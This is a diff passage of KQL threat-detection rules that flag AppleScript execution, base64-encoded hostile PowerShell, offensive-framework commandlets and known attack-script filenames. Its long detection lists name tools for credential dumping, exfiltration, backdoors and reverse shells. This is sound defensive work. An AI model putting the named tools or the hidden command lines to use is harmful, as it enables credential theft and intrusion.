-// False Positives:
-// - Application installers might contain scripts as part of the installation process.
-
-DeviceProcessEvents
+// Title: MacOS Scripting Interpreter AppleScript
+// Author: Alejandro Ortuno, oscd.community
+// Date: 2020-10-21
+// Level: medium
+// Description: Detects execution of AppleScript of the macOS scripting language AppleScript.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.002
+// False Positives:
+// - Application installers might contain scripts as part of the installation process.
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " -e " or ProcessCommandLine contains ".scpt" or ProcessCommandLine contains ".js") and FolderPath endswith "/osascript"
\ No newline at end of file
diff --git a/KQL/rules/Execution/malicious_base64_encoded_powershell_keywords_in_command_lines.kql b/KQL/rules/Execution/malicious_base64_encoded_powershell_keywords_in_command_lines.kql
index 37f72b9e..faad903c 100644
--- a/KQL/rules/Execution/malicious_base64_encoded_powershell_keywords_in_command_lines.kql
+++ b/KQL/rules/Execution/malicious_base64_encoded_powershell_keywords_in_command_lines.kql
@@ -1,10 +1,10 @@
-// Title: Malicious Base64 Encoded PowerShell Keywords in Command Lines
-// Author: John Lambert (rule)
-// Date: 2019-01-16
-// Level: high
-// Description: Detects base64 encoded strings used in hidden malicious PowerShell command lines
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.001
-
-DeviceProcessEvents
+// Title: Malicious Base64 Encoded PowerShell Keywords in Command Lines
+// Author: John Lambert (rule)
+// Date: 2019-01-16
+// Level: high
+// Description: Detects base64 encoded strings used in hidden malicious PowerShell command lines
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA" or ProcessCommandLine contains "aXRzYWRtaW4gL3RyYW5zZmVy" or ProcessCommandLine contains "IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA" or ProcessCommandLine contains "JpdHNhZG1pbiAvdHJhbnNmZX" or ProcessCommandLine contains "YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg" or ProcessCommandLine contains "Yml0c2FkbWluIC90cmFuc2Zlc" or ProcessCommandLine contains "AGMAaAB1AG4AawBfAHMAaQB6AGUA" or ProcessCommandLine contains "JABjAGgAdQBuAGsAXwBzAGkAegBlA" or ProcessCommandLine contains "JGNodW5rX3Npem" or ProcessCommandLine contains "QAYwBoAHUAbgBrAF8AcwBpAHoAZQ" or ProcessCommandLine contains "RjaHVua19zaXpl" or ProcessCommandLine contains "Y2h1bmtfc2l6Z" or ProcessCommandLine contains "AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A" or ProcessCommandLine contains "kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg" or ProcessCommandLine contains "lPLkNvbXByZXNzaW9u" or ProcessCommandLine contains "SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA" or ProcessCommandLine contains "SU8uQ29tcHJlc3Npb2" or ProcessCommandLine contains "Ty5Db21wcmVzc2lvb" or ProcessCommandLine contains "AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ" or ProcessCommandLine contains "kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA" or ProcessCommandLine contains
"lPLk1lbW9yeVN0cmVhb" or ProcessCommandLine contains "SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A" or ProcessCommandLine contains "SU8uTWVtb3J5U3RyZWFt" or ProcessCommandLine contains "Ty5NZW1vcnlTdHJlYW" or ProcessCommandLine contains "4ARwBlAHQAQwBoAHUAbgBrA" or ProcessCommandLine contains "5HZXRDaHVua" or ProcessCommandLine contains "AEcAZQB0AEMAaAB1AG4Aaw" or ProcessCommandLine contains "LgBHAGUAdABDAGgAdQBuAGsA" or ProcessCommandLine contains "LkdldENodW5r" or ProcessCommandLine contains "R2V0Q2h1bm" or ProcessCommandLine contains "AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A" or ProcessCommandLine contains "QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA" or ProcessCommandLine contains "RIUkVBRF9JTkZPNj" or ProcessCommandLine contains "SFJFQURfSU5GTzY0" or ProcessCommandLine contains "VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA" or ProcessCommandLine contains "VEhSRUFEX0lORk82N" or ProcessCommandLine contains "AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA" or ProcessCommandLine contains "cmVhdGVSZW1vdGVUaHJlYW" or ProcessCommandLine contains "MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA" or ProcessCommandLine contains "NyZWF0ZVJlbW90ZVRocmVhZ" or ProcessCommandLine contains "Q3JlYXRlUmVtb3RlVGhyZWFk" or ProcessCommandLine contains "QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA" or ProcessCommandLine contains "0AZQBtAG0AbwB2AGUA" or ProcessCommandLine contains "1lbW1vdm" or ProcessCommandLine contains "AGUAbQBtAG8AdgBlA" or ProcessCommandLine contains "bQBlAG0AbQBvAHYAZQ" or ProcessCommandLine contains "bWVtbW92Z" or ProcessCommandLine contains "ZW1tb3Zl") and ProcessCommandLine contains " hidden " and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/malicious_powershell_commandlets_processcreation.kql b/KQL/rules/Execution/malicious_powershell_commandlets_processcreation.kql
index ae7cddf5..a8fe0a43 100644
--- a/KQL/rules/Execution/malicious_powershell_commandlets_processcreation.kql
+++ b/KQL/rules/Execution/malicious_powershell_commandlets_processcreation.kql
@@ -1,10 +1,10 @@
-// Title: Malicious PowerShell Commandlets - ProcessCreation
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-01-02
-// Level: high
-// Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.discovery, attack.t1482, attack.t1087, attack.t1087.001, attack.t1087.002, attack.t1069.001, attack.t1069.002, attack.t1069, attack.t1059.001
-
-DeviceProcessEvents
+// Title: Malicious PowerShell Commandlets - ProcessCreation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-02
+// Level: high
+// Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.discovery, attack.t1482, attack.t1087, attack.t1087.001, attack.t1087.002, attack.t1069.001, attack.t1069.002, attack.t1069, attack.t1059.001
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "Add-Exfiltration" or ProcessCommandLine contains "Add-Persistence" or ProcessCommandLine contains "Add-RegBackdoor" or ProcessCommandLine contains "Add-RemoteRegBackdoor" or ProcessCommandLine contains "Add-ScrnSaveBackdoor" or ProcessCommandLine contains "Check-VM" or ProcessCommandLine contains "ConvertTo-Rc4ByteStream" or ProcessCommandLine contains "Decrypt-Hash" or ProcessCommandLine contains "Disable-ADIDNSNode" or ProcessCommandLine contains "Disable-MachineAccount" or ProcessCommandLine contains "Do-Exfiltration" or ProcessCommandLine contains "Enable-ADIDNSNode" or ProcessCommandLine contains "Enable-MachineAccount" or ProcessCommandLine contains "Enabled-DuplicateToken" or ProcessCommandLine contains "Exploit-Jboss" or ProcessCommandLine contains "Export-ADR" or ProcessCommandLine contains "Export-ADRCSV" or ProcessCommandLine contains "Export-ADRExcel" or ProcessCommandLine contains "Export-ADRHTML" or ProcessCommandLine contains "Export-ADRJSON" or ProcessCommandLine 
contains "Export-ADRXML" or ProcessCommandLine contains "Find-Fruit" or ProcessCommandLine contains "Find-GPOLocation" or ProcessCommandLine contains "Find-TrustedDocuments" or ProcessCommandLine contains "Get-ADIDNS" or ProcessCommandLine contains "Get-ApplicationHost" or ProcessCommandLine contains "Get-ChromeDump" or ProcessCommandLine contains "Get-ClipboardContents" or ProcessCommandLine contains "Get-FoxDump" or ProcessCommandLine contains "Get-GPPPassword" or ProcessCommandLine contains "Get-IndexedItem" or ProcessCommandLine contains "Get-KerberosAESKey" or ProcessCommandLine contains "Get-Keystrokes" or ProcessCommandLine contains "Get-LSASecret" or ProcessCommandLine contains "Get-MachineAccountAttribute" or ProcessCommandLine contains "Get-MachineAccountCreator" or ProcessCommandLine contains "Get-PassHashes" or ProcessCommandLine contains "Get-RegAlwaysInstallElevated" or ProcessCommandLine contains "Get-RegAutoLogon" or ProcessCommandLine contains "Get-RemoteBootKey" or ProcessCommandLine contains "Get-RemoteCachedCredential" or ProcessCommandLine contains "Get-RemoteLocalAccountHash" or ProcessCommandLine contains "Get-RemoteLSAKey" or ProcessCommandLine contains "Get-RemoteMachineAccountHash" or ProcessCommandLine contains "Get-RemoteNLKMKey" or ProcessCommandLine contains "Get-RickAstley" or ProcessCommandLine contains "Get-Screenshot" or ProcessCommandLine contains "Get-SecurityPackages" or ProcessCommandLine contains "Get-ServiceFilePermission" or ProcessCommandLine contains "Get-ServicePermission" or ProcessCommandLine contains "Get-ServiceUnquoted" or ProcessCommandLine contains "Get-SiteListPassword" or ProcessCommandLine contains "Get-System" or ProcessCommandLine contains "Get-TimedScreenshot" or ProcessCommandLine contains "Get-UnattendedInstallFile" or ProcessCommandLine contains "Get-Unconstrained" or ProcessCommandLine contains "Get-USBKeystrokes" or ProcessCommandLine contains "Get-VaultCredential" or ProcessCommandLine contains 
"Get-VulnAutoRun" or ProcessCommandLine contains "Get-VulnSchTask" or ProcessCommandLine contains "Grant-ADIDNSPermission" or ProcessCommandLine contains "Gupt-Backdoor" or ProcessCommandLine contains "HTTP-Login" or ProcessCommandLine contains "Install-ServiceBinary" or ProcessCommandLine contains "Install-SSP" or ProcessCommandLine contains "Invoke-ACLScanner" or ProcessCommandLine contains "Invoke-ADRecon" or ProcessCommandLine contains "Invoke-ADSBackdoor" or ProcessCommandLine contains "Invoke-AgentSmith" or ProcessCommandLine contains "Invoke-AllChecks" or ProcessCommandLine contains "Invoke-ARPScan" or ProcessCommandLine contains "Invoke-AzureHound" or ProcessCommandLine contains "Invoke-BackdoorLNK" or ProcessCommandLine contains "Invoke-BadPotato" or ProcessCommandLine contains "Invoke-BetterSafetyKatz" or ProcessCommandLine contains "Invoke-BypassUAC" or ProcessCommandLine contains "Invoke-Carbuncle" or ProcessCommandLine contains "Invoke-Certify" or ProcessCommandLine contains "Invoke-ConPtyShell" or ProcessCommandLine contains "Invoke-CredentialInjection" or ProcessCommandLine contains "Invoke-DAFT" or ProcessCommandLine contains "Invoke-DCSync" or ProcessCommandLine contains "Invoke-DinvokeKatz" or ProcessCommandLine contains "Invoke-DllInjection" or ProcessCommandLine contains "Invoke-DNSUpdate" or ProcessCommandLine contains "Invoke-DomainPasswordSpray" or ProcessCommandLine contains "Invoke-DowngradeAccount" or ProcessCommandLine contains "Invoke-EgressCheck" or ProcessCommandLine contains "Invoke-Eyewitness" or ProcessCommandLine contains "Invoke-FakeLogonScreen" or ProcessCommandLine contains "Invoke-Farmer" or ProcessCommandLine contains "Invoke-Get-RBCD-Threaded" or ProcessCommandLine contains "Invoke-Gopher" or ProcessCommandLine contains "Invoke-Grouper" or ProcessCommandLine contains "Invoke-HandleKatz" or ProcessCommandLine contains "Invoke-ImpersonatedProcess" or ProcessCommandLine contains "Invoke-ImpersonateSystem" or ProcessCommandLine 
contains "Invoke-InteractiveSystemPowerShell" or ProcessCommandLine contains "Invoke-Internalmonologue" or ProcessCommandLine contains "Invoke-Inveigh" or ProcessCommandLine contains "Invoke-InveighRelay" or ProcessCommandLine contains "Invoke-KrbRelay" or ProcessCommandLine contains "Invoke-LdapSignCheck" or ProcessCommandLine contains "Invoke-Lockless" or ProcessCommandLine contains "Invoke-MalSCCM" or ProcessCommandLine contains "Invoke-Mimikatz" or ProcessCommandLine contains "Invoke-Mimikittenz" or ProcessCommandLine contains "Invoke-MITM6" or ProcessCommandLine contains "Invoke-NanoDump" or ProcessCommandLine contains "Invoke-NetRipper" or ProcessCommandLine contains "Invoke-Nightmare" or ProcessCommandLine contains "Invoke-NinjaCopy" or ProcessCommandLine contains "Invoke-OfficeScrape" or ProcessCommandLine contains "Invoke-OxidResolver" or ProcessCommandLine contains "Invoke-P0wnedshell" or ProcessCommandLine contains "Invoke-Paranoia" or ProcessCommandLine contains "Invoke-PortScan" or ProcessCommandLine contains "Invoke-PoshRatHttp" or ProcessCommandLine contains "Invoke-PostExfil" or ProcessCommandLine contains "Invoke-PowerDump" or ProcessCommandLine contains "Invoke-PowerDPAPI" or ProcessCommandLine contains "Invoke-PowerShellTCP" or ProcessCommandLine contains "Invoke-PowerShellWMI" or ProcessCommandLine contains "Invoke-PPLDump" or ProcessCommandLine contains "Invoke-PsExec" or ProcessCommandLine contains "Invoke-PSInject" or ProcessCommandLine contains "Invoke-PsUaCme" or ProcessCommandLine contains "Invoke-ReflectivePEInjection" or ProcessCommandLine contains "Invoke-ReverseDNSLookup" or ProcessCommandLine contains "Invoke-Rubeus" or ProcessCommandLine contains "Invoke-RunAs" or ProcessCommandLine contains "Invoke-SafetyKatz" or ProcessCommandLine contains "Invoke-SauronEye" or ProcessCommandLine contains "Invoke-SCShell" or ProcessCommandLine contains "Invoke-Seatbelt" or ProcessCommandLine contains "Invoke-ServiceAbuse" or ProcessCommandLine 
contains "Invoke-ShadowSpray" or ProcessCommandLine contains "Invoke-Sharp" or ProcessCommandLine contains "Invoke-Shellcode" or ProcessCommandLine contains "Invoke-SMBScanner" or ProcessCommandLine contains "Invoke-Snaffler" or ProcessCommandLine contains "Invoke-Spoolsample" or ProcessCommandLine contains "Invoke-SpraySinglePassword" or ProcessCommandLine contains "Invoke-SSHCommand" or ProcessCommandLine contains "Invoke-StandIn" or ProcessCommandLine contains "Invoke-StickyNotesExtract" or ProcessCommandLine contains "Invoke-SystemCommand" or ProcessCommandLine contains "Invoke-Tasksbackdoor" or ProcessCommandLine contains "Invoke-Tater" or ProcessCommandLine contains "Invoke-Thunderfox" or ProcessCommandLine contains "Invoke-ThunderStruck" or ProcessCommandLine contains "Invoke-TokenManipulation" or ProcessCommandLine contains "Invoke-Tokenvator" or ProcessCommandLine contains "Invoke-TotalExec" or ProcessCommandLine contains "Invoke-UrbanBishop" or ProcessCommandLine contains "Invoke-UserHunter" or ProcessCommandLine contains "Invoke-VoiceTroll" or ProcessCommandLine contains "Invoke-Whisker" or ProcessCommandLine contains "Invoke-WinEnum" or ProcessCommandLine contains "Invoke-winPEAS" or ProcessCommandLine contains "Invoke-WireTap" or ProcessCommandLine contains "Invoke-WmiCommand" or ProcessCommandLine contains "Invoke-WMIExec" or ProcessCommandLine contains "Invoke-WScriptBypassUAC" or ProcessCommandLine contains "Invoke-Zerologon" or ProcessCommandLine contains "MailRaider" or ProcessCommandLine contains "New-ADIDNSNode" or ProcessCommandLine contains "New-DNSRecordArray" or ProcessCommandLine contains "New-HoneyHash" or ProcessCommandLine contains "New-InMemoryModule" or ProcessCommandLine contains "New-MachineAccount" or ProcessCommandLine contains "New-SOASerialNumberArray" or ProcessCommandLine contains "Out-Minidump" or ProcessCommandLine contains "Port-Scan" or ProcessCommandLine contains "PowerBreach" or ProcessCommandLine contains "powercat " or 
ProcessCommandLine contains "PowerUp" or ProcessCommandLine contains "PowerView" or ProcessCommandLine contains "Remove-ADIDNSNode" or ProcessCommandLine contains "Remove-MachineAccount" or ProcessCommandLine contains "Remove-Update" or ProcessCommandLine contains "Rename-ADIDNSNode" or ProcessCommandLine contains "Revoke-ADIDNSPermission" or ProcessCommandLine contains "Set-ADIDNSNode" or ProcessCommandLine contains "Set-MacAttribute" or ProcessCommandLine contains "Set-MachineAccountAttribute" or ProcessCommandLine contains "Set-Wallpaper" or ProcessCommandLine contains "Show-TargetScreen" or ProcessCommandLine contains "Start-CaptureServer" or ProcessCommandLine contains "Start-Dnscat2" or ProcessCommandLine contains "Start-WebcamRecorder" or ProcessCommandLine contains "Veeam-Get-Creds" or ProcessCommandLine contains "VolumeShadowCopyTools"
\ No newline at end of file
diff --git a/KQL/rules/Execution/malicious_powershell_scripts_filecreation.kql b/KQL/rules/Execution/malicious_powershell_scripts_filecreation.kql
index 4cfbdda0..9b6c558c 100644
--- a/KQL/rules/Execution/malicious_powershell_scripts_filecreation.kql
+++ b/KQL/rules/Execution/malicious_powershell_scripts_filecreation.kql
@@ -1,10 +1,10 @@
-// Title: Malicious PowerShell Scripts - FileCreation
-// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein
-// Date: 2018-04-07
-// Level: high
-// Description: Detects the creation of known offensive powershell scripts used for exploitation
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.001
-
-DeviceFileEvents
+// Title: Malicious PowerShell Scripts - FileCreation
+// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein
+// Date: 2018-04-07
+// Level: high
+// Description: Detects the creation of known offensive powershell scripts used for exploitation
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceFileEvents
 | where (FolderPath endswith "\\Add-ConstrainedDelegationBackdoor.ps1" or FolderPath endswith "\\Add-Exfiltration.ps1" or FolderPath endswith "\\Add-Persistence.ps1" or FolderPath endswith "\\Add-RegBackdoor.ps1" or FolderPath endswith "\\Add-RemoteRegBackdoor.ps1" or FolderPath endswith "\\Add-ScrnSaveBackdoor.ps1" or FolderPath endswith "\\ADRecon.ps1" or FolderPath endswith "\\AzureADRecon.ps1" or FolderPath endswith "\\BadSuccessor.ps1" or FolderPath endswith "\\Check-VM.ps1" or FolderPath endswith "\\ConvertTo-ROT13.ps1" or FolderPath endswith "\\Copy-VSS.ps1" or FolderPath endswith "\\Create-MultipleSessions.ps1" or FolderPath endswith "\\DNS_TXT_Pwnage.ps1" or FolderPath endswith "\\dnscat2.ps1" or FolderPath endswith "\\Do-Exfiltration.ps1" or FolderPath endswith "\\DomainPasswordSpray.ps1" or FolderPath endswith "\\Download_Execute.ps1" or FolderPath endswith "\\Download-Execute-PS.ps1" or FolderPath endswith "\\Enable-DuplicateToken.ps1" or FolderPath endswith "\\Enabled-DuplicateToken.ps1" or FolderPath endswith "\\Execute-Command-MSSQL.ps1" or FolderPath endswith "\\Execute-DNSTXT-Code.ps1" or FolderPath endswith "\\Execute-OnTime.ps1" or FolderPath endswith 
"\\ExetoText.ps1" or FolderPath endswith "\\Exploit-Jboss.ps1" or FolderPath endswith "\\Find-AVSignature.ps1" or FolderPath endswith "\\Find-Fruit.ps1" or FolderPath endswith "\\Find-GPOLocation.ps1" or FolderPath endswith "\\Find-TrustedDocuments.ps1" or FolderPath endswith "\\FireBuster.ps1" or FolderPath endswith "\\FireListener.ps1" or FolderPath endswith "\\Get-ApplicationHost.ps1" or FolderPath endswith "\\Get-ChromeDump.ps1" or FolderPath endswith "\\Get-ClipboardContents.ps1" or FolderPath endswith "\\Get-ComputerDetail.ps1" or FolderPath endswith "\\Get-FoxDump.ps1" or FolderPath endswith "\\Get-GPPAutologon.ps1" or FolderPath endswith "\\Get-GPPPassword.ps1" or FolderPath endswith "\\Get-IndexedItem.ps1" or FolderPath endswith "\\Get-Keystrokes.ps1" or FolderPath endswith "\\Get-LSASecret.ps1" or FolderPath endswith "\\Get-MicrophoneAudio.ps1" or FolderPath endswith "\\Get-PassHashes.ps1" or FolderPath endswith "\\Get-PassHints.ps1" or FolderPath endswith "\\Get-RegAlwaysInstallElevated.ps1" or FolderPath endswith "\\Get-RegAutoLogon.ps1" or FolderPath endswith "\\Get-RickAstley.ps1" or FolderPath endswith "\\Get-Screenshot.ps1" or FolderPath endswith "\\Get-SecurityPackages.ps1" or FolderPath endswith "\\Get-ServiceFilePermission.ps1" or FolderPath endswith "\\Get-ServicePermission.ps1" or FolderPath endswith "\\Get-ServiceUnquoted.ps1" or FolderPath endswith "\\Get-SiteListPassword.ps1" or FolderPath endswith "\\Get-System.ps1" or FolderPath endswith "\\Get-TimedScreenshot.ps1" or FolderPath endswith "\\Get-UnattendedInstallFile.ps1" or FolderPath endswith "\\Get-Unconstrained.ps1" or FolderPath endswith "\\Get-USBKeystrokes.ps1" or FolderPath endswith "\\Get-VaultCredential.ps1" or FolderPath endswith "\\Get-VulnAutoRun.ps1" or FolderPath endswith "\\Get-VulnSchTask.ps1" or FolderPath endswith "\\Get-WebConfig.ps1" or FolderPath endswith "\\Get-WebCredentials.ps1" or FolderPath endswith "\\Get-WLAN-Keys.ps1" or FolderPath endswith 
"\\Gupt-Backdoor.ps1" or FolderPath endswith "\\HTTP-Backdoor.ps1" or FolderPath endswith "\\HTTP-Login.ps1" or FolderPath endswith "\\Install-ServiceBinary.ps1" or FolderPath endswith "\\Install-SSP.ps1" or FolderPath endswith "\\Invoke-ACLScanner.ps1" or FolderPath endswith "\\Invoke-ADSBackdoor.ps1" or FolderPath endswith "\\Invoke-AmsiBypass.ps1" or FolderPath endswith "\\Invoke-ARPScan.ps1" or FolderPath endswith "\\Invoke-BackdoorLNK.ps1" or FolderPath endswith "\\Invoke-BadPotato.ps1" or FolderPath endswith "\\Invoke-BetterSafetyKatz.ps1" or FolderPath endswith "\\Invoke-BruteForce.ps1" or FolderPath endswith "\\Invoke-BypassUAC.ps1" or FolderPath endswith "\\Invoke-Carbuncle.ps1" or FolderPath endswith "\\Invoke-Certify.ps1" or FolderPath endswith "\\Invoke-ConPtyShell.ps1" or FolderPath endswith "\\Invoke-CredentialInjection.ps1" or FolderPath endswith "\\Invoke-CredentialsPhish.ps1" or FolderPath endswith "\\Invoke-DAFT.ps1" or FolderPath endswith "\\Invoke-DCSync.ps1" or FolderPath endswith "\\Invoke-Decode.ps1" or FolderPath endswith "\\Invoke-DinvokeKatz.ps1" or FolderPath endswith "\\Invoke-DllInjection.ps1" or FolderPath endswith "\\Invoke-DNSUpdate.ps1" or FolderPath endswith "\\Invoke-DowngradeAccount.ps1" or FolderPath endswith "\\Invoke-EgressCheck.ps1" or FolderPath endswith "\\Invoke-Encode.ps1" or FolderPath endswith "\\Invoke-EventViewer.ps1" or FolderPath endswith "\\Invoke-Eyewitness.ps1" or FolderPath endswith "\\Invoke-FakeLogonScreen.ps1" or FolderPath endswith "\\Invoke-Farmer.ps1" or FolderPath endswith "\\Invoke-Get-RBCD-Threaded.ps1" or FolderPath endswith "\\Invoke-Gopher.ps1" or FolderPath endswith "\\Invoke-Grouper2.ps1" or FolderPath endswith "\\Invoke-Grouper3.ps1" or FolderPath endswith "\\Invoke-HandleKatz.ps1" or FolderPath endswith "\\Invoke-Interceptor.ps1" or FolderPath endswith "\\Invoke-Internalmonologue.ps1" or FolderPath endswith "\\Invoke-Inveigh.ps1" or FolderPath endswith "\\Invoke-InveighRelay.ps1" or FolderPath 
endswith "\\Invoke-JSRatRegsvr.ps1" or FolderPath endswith "\\Invoke-JSRatRundll.ps1" or FolderPath endswith "\\Invoke-KrbRelay.ps1" or FolderPath endswith "\\Invoke-KrbRelayUp.ps1" or FolderPath endswith "\\Invoke-LdapSignCheck.ps1" or FolderPath endswith "\\Invoke-Lockless.ps1" or FolderPath endswith "\\Invoke-MalSCCM.ps1" or FolderPath endswith "\\Invoke-Mimikatz.ps1" or FolderPath endswith "\\Invoke-MimikatzWDigestDowngrade.ps1" or FolderPath endswith "\\Invoke-Mimikittenz.ps1" or FolderPath endswith "\\Invoke-MITM6.ps1" or FolderPath endswith "\\Invoke-NanoDump.ps1" or FolderPath endswith "\\Invoke-NetRipper.ps1" or FolderPath endswith "\\Invoke-NetworkRelay.ps1" or FolderPath endswith "\\Invoke-NinjaCopy.ps1" or FolderPath endswith "\\Invoke-OxidResolver.ps1" or FolderPath endswith "\\Invoke-P0wnedshell.ps1" or FolderPath endswith "\\Invoke-P0wnedshellx86.ps1" or FolderPath endswith "\\Invoke-Paranoia.ps1" or FolderPath endswith "\\Invoke-PortScan.ps1" or FolderPath endswith "\\Invoke-PoshRatHttp.ps1" or FolderPath endswith "\\Invoke-PoshRatHttps.ps1" or FolderPath endswith "\\Invoke-PostExfil.ps1" or FolderPath endswith "\\Invoke-PowerDump.ps1" or FolderPath endswith "\\Invoke-PowerDPAPI.ps1" or FolderPath endswith "\\Invoke-PowerShellIcmp.ps1" or FolderPath endswith "\\Invoke-PowerShellTCP.ps1" or FolderPath endswith "\\Invoke-PowerShellTcpOneLine.ps1" or FolderPath endswith "\\Invoke-PowerShellTcpOneLineBind.ps1" or FolderPath endswith "\\Invoke-PowerShellUdp.ps1" or FolderPath endswith "\\Invoke-PowerShellUdpOneLine.ps1" or FolderPath endswith "\\Invoke-PowerShellWMI.ps1" or FolderPath endswith "\\Invoke-PowerThIEf.ps1" or FolderPath endswith "\\Invoke-PPLDump.ps1" or FolderPath endswith "\\Invoke-Prasadhak.ps1" or FolderPath endswith "\\Invoke-PsExec.ps1" or FolderPath endswith "\\Invoke-PsGcat.ps1" or FolderPath endswith "\\Invoke-PsGcatAgent.ps1" or FolderPath endswith "\\Invoke-PSInject.ps1" or FolderPath endswith "\\Invoke-PsUaCme.ps1" or FolderPath 
endswith "\\Invoke-ReflectivePEInjection.ps1" or FolderPath endswith "\\Invoke-ReverseDNSLookup.ps1" or FolderPath endswith "\\Invoke-Rubeus.ps1" or FolderPath endswith "\\Invoke-RunAs.ps1" or FolderPath endswith "\\Invoke-SafetyKatz.ps1" or FolderPath endswith "\\Invoke-SauronEye.ps1" or FolderPath endswith "\\Invoke-SCShell.ps1" or FolderPath endswith "\\Invoke-Seatbelt.ps1" or FolderPath endswith "\\Invoke-ServiceAbuse.ps1" or FolderPath endswith "\\Invoke-SessionGopher.ps1" or FolderPath endswith "\\Invoke-ShellCode.ps1" or FolderPath endswith "\\Invoke-SMBScanner.ps1" or FolderPath endswith "\\Invoke-Snaffler.ps1" or FolderPath endswith "\\Invoke-Spoolsample.ps1" or FolderPath endswith "\\Invoke-SSHCommand.ps1" or FolderPath endswith "\\Invoke-SSIDExfil.ps1" or FolderPath endswith "\\Invoke-StandIn.ps1" or FolderPath endswith "\\Invoke-StickyNotesExtract.ps1" or FolderPath endswith "\\Invoke-Tater.ps1" or FolderPath endswith "\\Invoke-Thunderfox.ps1" or FolderPath endswith "\\Invoke-ThunderStruck.ps1" or FolderPath endswith "\\Invoke-TokenManipulation.ps1" or FolderPath endswith "\\Invoke-Tokenvator.ps1" or FolderPath endswith "\\Invoke-TotalExec.ps1" or FolderPath endswith "\\Invoke-UrbanBishop.ps1" or FolderPath endswith "\\Invoke-UserHunter.ps1" or FolderPath endswith "\\Invoke-VoiceTroll.ps1" or FolderPath endswith "\\Invoke-Whisker.ps1" or FolderPath endswith "\\Invoke-WinEnum.ps1" or FolderPath endswith "\\Invoke-winPEAS.ps1" or FolderPath endswith "\\Invoke-WireTap.ps1" or FolderPath endswith "\\Invoke-WmiCommand.ps1" or FolderPath endswith "\\Invoke-WScriptBypassUAC.ps1" or FolderPath endswith "\\Invoke-Zerologon.ps1" or FolderPath endswith "\\Keylogger.ps1" or FolderPath endswith "\\MailRaider.ps1" or FolderPath endswith "\\New-HoneyHash.ps1" or FolderPath endswith "\\OfficeMemScraper.ps1" or FolderPath endswith "\\Offline_Winpwn.ps1" or FolderPath endswith "\\Out-CHM.ps1" or FolderPath endswith "\\Out-DnsTxt.ps1" or FolderPath endswith 
"\\Out-Excel.ps1" or FolderPath endswith "\\Out-HTA.ps1" or FolderPath endswith "\\Out-Java.ps1" or FolderPath endswith "\\Out-JS.ps1" or FolderPath endswith "\\Out-Minidump.ps1" or FolderPath endswith "\\Out-RundllCommand.ps1" or FolderPath endswith "\\Out-SCF.ps1" or FolderPath endswith "\\Out-SCT.ps1" or FolderPath endswith "\\Out-Shortcut.ps1" or FolderPath endswith "\\Out-WebQuery.ps1" or FolderPath endswith "\\Out-Word.ps1" or FolderPath endswith "\\Parse_Keys.ps1" or FolderPath endswith "\\Port-Scan.ps1" or FolderPath endswith "\\PowerBreach.ps1" or FolderPath endswith "\\powercat.ps1" or FolderPath endswith "\\Powermad.ps1" or FolderPath endswith "\\PowerRunAsSystem.psm1" or FolderPath endswith "\\PowerSharpPack.ps1" or FolderPath endswith "\\PowerUp.ps1" or FolderPath endswith "\\PowerUpSQL.ps1" or FolderPath endswith "\\PowerView.ps1" or FolderPath endswith "\\PSAsyncShell.ps1" or FolderPath endswith "\\RemoteHashRetrieval.ps1" or FolderPath endswith "\\Remove-Persistence.ps1" or FolderPath endswith "\\Remove-PoshRat.ps1" or FolderPath endswith "\\Remove-Update.ps1" or FolderPath endswith "\\Run-EXEonRemote.ps1" or FolderPath endswith "\\Schtasks-Backdoor.ps1" or FolderPath endswith "\\Set-DCShadowPermissions.ps1" or FolderPath endswith "\\Set-MacAttribute.ps1" or FolderPath endswith "\\Set-RemotePSRemoting.ps1" or FolderPath endswith "\\Set-RemoteWMI.ps1" or FolderPath endswith "\\Set-Wallpaper.ps1" or FolderPath endswith "\\Show-TargetScreen.ps1" or FolderPath endswith "\\Speak.ps1" or FolderPath endswith "\\Start-CaptureServer.ps1" or FolderPath endswith "\\Start-WebcamRecorder.ps1" or FolderPath endswith "\\StringToBase64.ps1" or FolderPath endswith "\\TexttoExe.ps1" or FolderPath endswith "\\Veeam-Get-Creds.ps1" or FolderPath endswith "\\VolumeShadowCopyTools.ps1" or FolderPath endswith "\\WinPwn.ps1" or FolderPath endswith "\\WSUSpendu.ps1") or (FolderPath contains "Invoke-Sharp" and FolderPath endswith ".ps1") \ No newline at end of file 
